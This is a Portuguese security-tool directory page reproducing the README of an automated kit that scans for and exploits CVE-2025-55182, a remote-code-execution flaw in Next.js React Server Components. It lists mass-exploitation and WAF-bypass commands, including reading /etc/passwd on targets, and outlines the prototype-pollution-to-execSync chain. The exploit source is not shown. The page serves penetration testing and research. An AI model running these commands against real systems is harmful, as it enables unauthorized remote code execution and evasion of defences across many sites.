Skip to content
KitploitKITPLOIT
FerramentasExploitsBlog
Log in
Enviar
FerramentasExploitsBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2025-55182-NextJS-Scanner-React2Shell-PoC — Kit automatizado de detecção e exploração para CVE-2025-55182, uma RCE crítica nos componentes do servidor React do Next.js. Inclui fingerprinting em múltiplas camadas, bypass de WAF e varredura em massa para testes de penetração. | Kitploit
Ferramentas/GitHubGitHub/exrienz/cve-2025-55182-nextjs-scanner-react2shell-poc
ReconhecimentoScanners de VulnerabilidadesGeração de PayloadsExploraçãoExploração de Aplicações WebBypass de WAFTestes de PenetraçãoComando e Controle

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
GitHub
exrienz/cve-2025-55182-nextjs-scanner-react2shell-poc

CVE-2025-55182-NextJS-Scanner-React2Shell-PoC

Kit automatizado de detecção e exploração para CVE-2025-55182, uma RCE crítica nos componentes do servidor React do Next.js. Inclui fingerprinting em múltiplas camadas, bypass de WAF e varredura em massa para testes de penetração.

Ver Repositório
16há 9 mesesAinda não revisado
Compartilhar

Ferramenta de Exploração CVE-2025-55182

Uma ferramenta abrangente de pesquisa em segurança para testar a vulnerabilidade de Execução Remota de Código (RCE) em Next.js React Server Components (CVE-2025-55182).

Visão Geral

Este kit de ferramentas oferece capacidades automatizadas de detecção e exploração para CVE-2025-55182, uma vulnerabilidade crítica de RCE que afeta aplicações Next.js que utilizam React Server Components. O kit consiste em três componentes integrados:

  • NextApp.py - Scanner inteligente de impressão digital de aplicações Next.js
  • exploit.sh - Ferramenta flexível de exploração para alvos únicos ou em massa
  • auto_exploit.sh - Orquestrador automatizado de varredura e exploração de ponta a ponta

Funcionalidades

  • Detecção Multicamadas: Análise de cabeçalhos, varredura de corpo e impressão digital de JavaScript
  • Pontuação de Confiança: Classificação inteligente (Alta/Média/Baixa) para minimizar falsos positivos
  • Bypass de WAF: Técnicas integradas para evadir firewalls de aplicações web comuns
  • Varredura em Massa: Processe múltiplos alvos eficientemente com relatórios detalhados
  • Fluxo de Trabalho Automatizado: Detecção e exploração com um único comando
  • Relatórios Detalhados: Arquivos de saída abrangentes com resultados categorizados

Requisitos

Componentes Python

  • Python 3.x
  • Biblioteca requests
pip3 install requests

Componentes Bash

  • curl
  • openssl
  • Utilitários Unix padrão (sed, grep, awk, mktemp)

Instalação

git clone https://github.com/yourusername/CVE-2025-55182-poc-tool.git
cd CVE-2025-55182-poc-tool
chmod +x exploit.sh auto_exploit.sh

Uso

Início Rápido (Recomendado)

A maneira mais rápida de varrer e explorar alvos:

# Create a file with target URLs (one per line)
echo "https://example.com" > targets.txt

# Auto-scan and exploit in one command
./auto_exploit.sh -i targets.txt -s -c "id"

Apenas Detecção

Identifique aplicações Next.js sem exploração:

python3 NextApp.py targets.txt

Arquivos de saída:

  • confirmed_nextjs_targets.txt - Todas as aplicações Next.js detectadas
  • high_confidence_nextjs_targets.txt - Apenas detecções de alta confiança

Exploração de Alvo Único

Teste alvos individuais:

# Basic exploitation
./exploit.sh -d https://target.com -c "whoami"

# With WAF bypass
./exploit.sh -d target.com -c "cat /etc/passwd" -w

# Custom WAF bypass size
./exploit.sh -d target.com -c "ls -la" --waf-bypass --waf-size 256

# Skip SSL verification
./exploit.sh -d https://target.com -c "id" -k

Exploração em Massa

Opção 1: Fluxo de Trabalho Unificado (Recomendado)

./auto_exploit.sh -i targets.txt -s -c "whoami"

Opção 2: Fluxo de Trabalho Manual em Duas Etapas

# Step 1: Detect Next.js applications
python3 NextApp.py targets.txt

# Step 2: Exploit confirmed targets
./auto_exploit.sh -c "id"

Opções Avançadas

# Full auto-scan with WAF bypass
./auto_exploit.sh -i targets.txt -s -w --waf-size 256 -c "whoami"

# Custom delays and timeouts
./auto_exploit.sh -i targets.txt -s --delay 5 --timeout 30 -c "id"

# Skip SSL verification in bulk mode
./auto_exploit.sh -i targets.txt -s -k -c "hostname"

Referência de Comandos

NextApp.py

python3 NextApp.py <targets_file>

Argumentos:

  • targets_file - Arquivo de texto contendo URLs de alvos (um por linha)

exploit.sh

./exploit.sh [OPTIONS]

Opções:

OpçãoDescriçãoPadrão
-d, --domainDomínio/URL do alvohttp://localhost:3000
-f, --fileArquivo com lista de alvos-
-c, --commandComando a executarid
-w, --waf-bypassAtivar bypass de WAFDesativado
--waf-size SIZETamanho dos dados de bypass de WAF (KB)128
--timeout SECONDSTimeout da requisição15
-k, --insecureIgnorar verificação SSLDesativado
--user-agent AGENTUser-Agent personalizadoMozilla/5.0...
-h, --helpMostrar mensagem de ajuda-

auto_exploit.sh

./auto_exploit.sh [OPTIONS]

Opções:

OpçãoDescriçãoPadrão
-i, --input FILEArquivo de entrada de alvosconfirmed_nextjs_targets.txt
-o, --output FILEArquivo de saída de resultadosexploit_results.txt
-c, --command CMDComando a executarid
-w, --waf-bypassAtivar bypass de WAFDesativado
--waf-size SIZETamanho do bypass de WAF (KB)128
--timeout SECONDSTimeout da requisição15
-k, --insecureIgnorar verificação SSLDesativado
--delay SECONDSAtraso entre requisições2
-s, --scanAuto-varredura primeiro para Next.jsDesativado
-h, --helpMostrar mensagem de ajuda-

Arquivos de Saída

confirmed_nextjs_targets.txt

Gerado por NextApp.py - contém todas as URLs identificadas como aplicações Next.js.

high_confidence_nextjs_targets.txt

Gerado por NextApp.py - contém apenas detecções Next.js de alta confiança (pontuação de confiança 100+).

exploit_results.txt

Gerado por auto_exploit.sh - relatório abrangente de exploração incluindo:

  • Alvos vulneráveis com saída do comando
  • Alvos não vulneráveis
  • Erros e seus detalhes
  • Estatísticas resumidas

Metodologia de Detecção

O scanner utiliza múltiplas técnicas de detecção com um sistema de pontuação de confiança:

Análise de Cabeçalhos (50 pontos cada)

  • Cabeçalhos específicos do Next.js: x-nextjs-*, x-vercel-*
  • x-powered-by: Next.js
  • Server: Vercel

Varredura de Corpo

  • Presença de __NEXT_DATA__ (100 pontos)
  • Padrão de buildId do Next.js (50 pontos)
  • Caminhos de ativos _next/* (25-75 pontos com base na quantidade)

Impressão Digital de JavaScript (60 pontos)

  • __NEXT_DATA__, __NEXT_LOADED_PAGES__
  • middlewareManifest, self.__RSC_MANIFEST

Limiares de Confiança:

  • Alta (100+): Múltiplos indicadores fortes
  • Média (75-99): Vários indicadores moderados
  • Baixa (50-74): Evidência mínima
  • Abaixo de 50: Rejeitado como falso positivo

Mecanismo de Exploração

O exploit aproveita uma cadeia de poluição de protótipo nos React Server Components do Next.js:

  1. Constrói dados de formulário multiparte com payload aninhado
  2. Polui a cadeia __proto__ via desserialização JSON
  3. Injeta JavaScript arbitrário em _response._prefix
  4. Executa comandos via process.mainModule.require('child_process').execSync()
  5. Extrai resultados do cabeçalho X-Action-Redirect
  6. Decodifica URL e formata a saída

Técnicas de Bypass de WAF

O kit de ferramentas inclui capacidades integradas de bypass de WAF:

  • Injeção de Dados Lixo: Prefixa dados aleatórios para evadir filtros baseados em tamanho
  • Limites Dinâmicos: Limites multiparte aleatórios
  • Randomização de ID de Requisição: IDs únicos por requisição
  • Tamanho Configurável: Tamanho ajustável de dados lixo (padrão 128KB)

Ative com as flags -w ou --waf-bypass.

Exemplos

Varrer e Explorar Aplicação Web

# Create target list
cat > targets.txt << EOF
https://app.example.com
https://dashboard.example.com
https://admin.example.com
EOF

# Run unified scan
./auto_exploit.sh -i targets.txt -s -c "whoami"

# Check results
cat exploit_results.txt

Testar Alvo Único com Bypass de WAF

./exploit.sh -d https://target.com -c "cat /etc/passwd" -w --waf-size 256

Apenas Alvos de Alta Confiança

# Step 1: Detect and filter
python3 NextApp.py targets.txt

# Step 2: Exploit high-confidence only
./auto_exploit.sh -i high_confidence_nextjs_targets.txt -c "id"

Aviso Legal

Esta ferramenta destina-se apenas a testes de segurança autorizados e fins de pesquisa. Os usuários devem:

Baixar ferramenta